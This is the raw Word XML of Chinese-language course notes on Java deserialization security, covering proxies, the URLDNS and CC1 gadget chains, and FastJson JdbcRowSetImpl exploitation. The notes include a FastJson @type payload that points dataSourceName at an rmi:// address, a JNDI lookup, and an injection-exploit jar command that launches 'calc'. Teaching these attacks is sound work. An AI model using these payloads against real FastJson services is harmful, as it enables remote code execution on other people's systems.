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8276" w14:textId="77777777" w:rsidR="000C4D16" w:rsidRDefault="000C4D16" w:rsidP="000C4D16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-JavaEE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原生和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>FastJson</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>反序列化</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&amp;URLDNS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>链</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&amp;JDBC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>链</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&amp;Gadget</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>手搓</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76F9BBCF" w14:textId="11616B6D" w:rsidR="000C4D16" w:rsidRDefault="000C4D16" w:rsidP="000C4D1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9669754" wp14:editId="5EC6F2E7">
            <wp:extent cx="5274310" cy="1902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F752" w14:textId="77777777" w:rsidR="000C4D16" w:rsidRDefault="000C4D16" w:rsidP="000C4D1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-JavaEE-FastJson-JdbcRowSetImpl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516B0032" w14:textId="7020EABE" w:rsidR="000C4D16" w:rsidRDefault="000C4D16" w:rsidP="000C4D16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7FC85F6F" wp14:editId="64F6EE4D">
            <wp:extent cx="5274310" cy="2894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5E3A" w14:textId="2A5AE2B1" w:rsidR="000C4D16" w:rsidRDefault="000C4D16" w:rsidP="000C4D1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5021112" wp14:editId="2D2CCA55">
            <wp:extent cx="5274310" cy="84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854D" w14:textId="56BCB739" w:rsidR="000C4D16" w:rsidRDefault="000C4D16" w:rsidP="000C4D1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B55C12B" wp14:editId="76207887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B796" w14:textId="77777777" w:rsidR="000C4D16" w:rsidRDefault="000C4D16" w:rsidP="000C4D1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6E3FBC72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-JavaEE-Servlet&amp;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生命周期</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E2D6225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过滤器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Filter&amp;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监听器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Listen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E1ADB50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-JavaEE-Maven&amp;JDBC&amp;Mybatis&amp;Hibernate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="775C7CE7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-JavaEE-ORM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预编译</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="323098E3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类加载器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0D6616C2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成员变量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构造方法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成员方法</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2083BF3C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动态代理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</w:p>
    <w:p w14:paraId="794C2175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利用链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危险方法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重写方法</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78AC7C56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原生反序列化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&amp;URLDNS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0C2AF2BF" w14:textId="77777777" w:rsidR="000C4D16" w:rsidRDefault="000C4D16" w:rsidP="000C4D1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-JavaEE-FastJson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&amp;JDBC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66AF3478" w14:textId="77777777" w:rsidR="000C4D16" w:rsidRDefault="000C4D16" w:rsidP="000C4D1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代理模式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当中最常用的设计模式之一。其特征是代理类与委托类有同样的接口，代理类主要负责为委托类预处理消息、过滤消息、把消息转发给委托类，以及事后处理消息等。而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的代理机制分为静态代理和动态代理，而这里我们主要重点学习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自带的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动态代理机制。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、创建接口及定义方法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、实现接口及定义方法操作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、实现接口及重写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invoke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、创建代理对象并调用方法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安全总结：利用条件分析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invoke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安全案例：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Ysoserial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CC1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LazyMap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proofErr w:type="gramEnd"/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、序列化与反序列化（见图）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序列化：将内存中的对象压缩成字节流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反序列化：将字节流转化成内存中的对象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序列化与反序列化其实就是对象与数据格式的转换。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、为什么有序列化技术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序列化与反序列化的设计就是用来传输数据的。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当两个进程进行通信的时候，可以通过序列化反序列化来进行传输。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能够实现数据的持久化，通过序列化可以把数据永久的保存在硬盘上，也可以理解为通过序列化将数据保存在文件中。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应用场景：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想把内存中的对象保存到一个文件中或者是数据库当中。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用套接字在网络上传输对象。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传输对象的时候。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、常见的创建的序列化和反序列化协议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• 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writeObject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XMLDecoder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XMLEncoder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XStream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SnakeYaml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FastJson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Jackson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、为什么会出现反序列化安全问题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writeObject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内置原生写法分析：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writeObject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主要用于将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对象序列化为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字节流并写入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输出流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主要用于从输入流中读取字节序列反序列化为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FileInputStream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：其主要作用是从文件读取字节数据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FileOutputStream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：其主要作用是将字节数据写入文件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ObjectInputStream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：用于从输入流中读取对象，实现对象的反序列化操作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ObjectOutputStream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：用于将对象并写入输出流的类，实现对象的序列化操作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利用看下面：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看序列化的对象有没有重写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方法（危险代码）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看序列化的对象有没有被输出就会调用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方法（危险代码）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其他类的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方法（反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序列化类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可控）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、反序列化利用链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入口类的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直接调用危险方法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入口参数中包含可控类，该类有危险方法，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时调用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入口类参数包含可控类，该类又调用其他有危险方法类，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构造函数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静态代码块等类加载时隐式执行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、反序列化利用条件：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可控的输入变量进行了反序列化操作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实现了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Serializable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或者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Externalizable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接口的类的对象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能找到调用方法的危险代码或间接的利用链引发（依赖链）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A7CCA70" w14:textId="77777777" w:rsidR="000C4D16" w:rsidRDefault="000C4D16" w:rsidP="000C4D16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利用链也叫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"gadget chains"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，我们通常称为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gadget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、共同条件：实现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Serializable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Externalizable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接口，最好是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带或者</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="990055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常用组件里有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、入口类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：（重写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readObject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调用常见函数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参数类型宽泛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最好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自带）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、调用链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gadget chain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：相同方法名、相同类型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、执行类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sink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写文件等等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原生反序列化及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自带链）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核心：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util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实现了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Serializable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接口满足条件后，通过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里面的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的转变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类，再到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URLStreamHandler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readObject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putVal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HashMap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hash   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handler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URLStreamHandler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getHostAddress</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/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写利用链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R3c5538ZML2yCF9pYUky6g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搞清楚入口类，需要修改的值，需要传递的值，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泛型，（后续操作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类即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类型值）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在创建一个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连接，（将要请求的地址写入对应代码的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用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put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方法把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数据存放到里面，触发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putVal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hash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里面会调用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最终触发点是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，所以我们就需要给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的类型设置成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通过逻辑让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的值为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handler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URLStreamHandler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hashCode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，最终调用里面的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getHostAddress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实现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#FastJson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JdbcRowSetImp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自带链）：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t8sjv0Zg8_KMjuW4t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FastJson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是啊里巴巴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开源库，用于对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格式的数据进行解析和打包。其实简单的来说就是处理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格式的数据的。例如将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转换成一个类。或者是将一个类转换成一段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Fastjson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库，提供了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Java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相互转换。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dependency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groupId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alibaba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groupId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artifactId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artifactId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1.2.24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dependency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应用知识：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、序列化方法：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toJSONString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，返回字符串；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toJSONBytes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，返回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byte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数组；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、反序列化方法：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parseObject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，返回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；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parse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，返回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；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parseArray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JSONArray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对象转换为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toJavaObject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；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对象写入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write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writeJSONString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；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、常用：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toJSONString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parse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parseObject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使用引出安全：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、序列化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固定类后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parse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方法在调用时会调用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parseObject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在调用时会调用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、反序列化指定类后：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parseObject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在调用时会调用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安全利用链：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自带链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setProperty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"com.sun.jndi.rmi.object.trustURLCodebase"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"true"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String payload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"{"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"\"@type\":\"com.sun.rowset.JdbcRowSetImpl\","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"\"dataSourceName\":\"rmi://xx.xx.xx.xx/xxxx\", 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"\"autoCommit\":true"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"}"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parse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反序列化对象：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sun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rowset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JdbcRowSetImpl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改动的成员变量：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dataSourceName autoCommit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setdataSourceName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getdataSourceName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setautoCommit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connect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DataSource var2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DataSource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var1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getDataSourceName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());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注入：触发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RCE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DataSource var2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DataSource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var1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"rmi://192.168.1.2:1099/jvelrl"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var1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lookup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协议远程调用（引出下节课将讲到）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autoCommit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setAutoCommit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connect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var1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getDataSourceName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恶意调用类：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java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jar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Injection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Exploit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SNAPSHOT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jar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"calc"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="506F2BA3" w14:textId="77777777" w:rsidR="000C4D16" w:rsidRDefault="000C4D16" w:rsidP="000C4D16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AA27921" w14:textId="77777777" w:rsidR="00611733" w:rsidRPr="000C4D16" w:rsidRDefault="00611733"/>
    <w:sectPr w:rsidR="00611733" w:rsidRPr="000C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C1D2C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B84E1F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ED"/>
    <w:rsid w:val="000C35ED"/>
    <w:rsid w:val="000C4D16"/>
    <w:rsid w:val="0061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39B8A-0404-4CEB-850D-DF50A6E3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0C4D1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4D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4D1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C4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2025-02-27T05:56:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-02-27T05:57:00Z</dcterms:modified>
</cp:coreProperties>
</file>